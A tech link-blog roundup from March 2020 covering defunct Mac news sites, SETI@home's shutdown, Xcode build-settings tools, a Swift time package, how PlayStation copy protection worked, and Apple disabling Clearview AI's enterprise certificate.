It’s sad to see websites shut down for any reason, and it seem like some of the older, more established sites just aren’t making it anymore. […] Well, that list gave me a good look at the sites that are no longer with us…

[…]

That’s not including The Unofficial Apple Weblog (killed by AOL in February, 2015), MacCentral, Macsimum News, and Apple Daily Report — websites that Dennis and I were involved with over the years.

SETI@home Shuts Down

Lawrence Abrams:

SETI@home has announced that they will no longer be distributing new work to clients starting on March 31st as they have enough data and want to focus on completing their back-end analysis of the data.

SETI@home is a distributed computing project where volunteers contribute their CPU resources to analyze radio data from the Arecibo radio telescope in Puerto Rico and the Green Bank Telescope in West Virginia for signs of extraterrestrial intelligence (SETI).

Monday, March 2, 2020

Xconfig and XcodeBuildSettings.com

Paulo Andrade (tweet):

If you’re like me, when working with .xcconfig files or building your shell script to include in a “Run Script” phase, you’ll keep running to the Terminal to run this:

xcodebuild -project <Project>.xcodeproj -target <Target> -showBuildSettings

[…]

So I’ve build Xconfig, a simple Mac app to display build settings for the currently open Xcode projects.

Mattt Thompson:

Introducing XcodeBuildSettings.com: a convenient reference of available build settings for Xcode projects.

Previously:

“Time” Swift Package

Dave DeLong (tweet):

Time is a Swift package to make date and time calculations much easier. As Apple platform developers we’ve been blessed to have the raw power of the Foundation APIs available to us. These are, arguably, some of the most powerful calendaring APIs out there.

However, they have a myriad of sharp edges the frequently trip up developers. Time is my attempt to solve those problems. I won’t go in to detail here about what those problems are; for that I’ll encourage you to check out the Time repository on github.

PlayStation Copy Protection

Technology Connections:

The original PlayStation is a pretty neat thing. Using the CD as a storage medium was a smart move. But, Sony needed to add anti-piracy features to the disc to prevent miscreants from making bootleg copies of Crash Bandicoot. This video tells the story of how that works, why it wasn’t infallible, and also proposes a potentially impervious solution (24 years late, though).

Via SwiftOnSecurity:

PlayStation DRM wasn’t based on hiding data on the CD. You can read them with a PC. They wrote DRM data via the spiral that’s are slightly perturbed in a pattern. At home you can write the data on a CD, but not the vibration of the spiral

Update (2020-03-12): Ashley Bischoff:

If you haven’t seen it already, I can strongly vouch for this video on “How the Sony PlayStation PS1 Security Was Defeated” from @ModernVintageG.

Apple Disables Clearview AI’s Enterprise Certificate

BuzzFeed (Hacker News, MacRumors):

Apple has disabled the iOS application of Clearview AI — the facial recognition company that claims to have amassed a database of billions of photos and has worked with thousands of organizations around the world — after BuzzFeed News determined that the New York–based startup had been violating the iPhone maker’s rules around app distribution.

[…]

An Apple spokesperson told BuzzFeed News that the Apple Developer Enterprise Program should only be used to distribute apps within a company. Companies that violate that rule, the spokesperson said, are subject to revocation of their accounts. Clearview has 14 days to respond to Apple.

Zack Whittaker (via Matthew Panzarino):

The app allows its users — which the company claims it serves only law enforcement officers — to use their phone camera or upload a photo to search its database of 3 billion photos. But BuzzFeed News revealed that the company — which claims to only cater to law enforcement users — also includes many private-sector users, including Macy’s, Walmart and Wells Fargo.

Previously: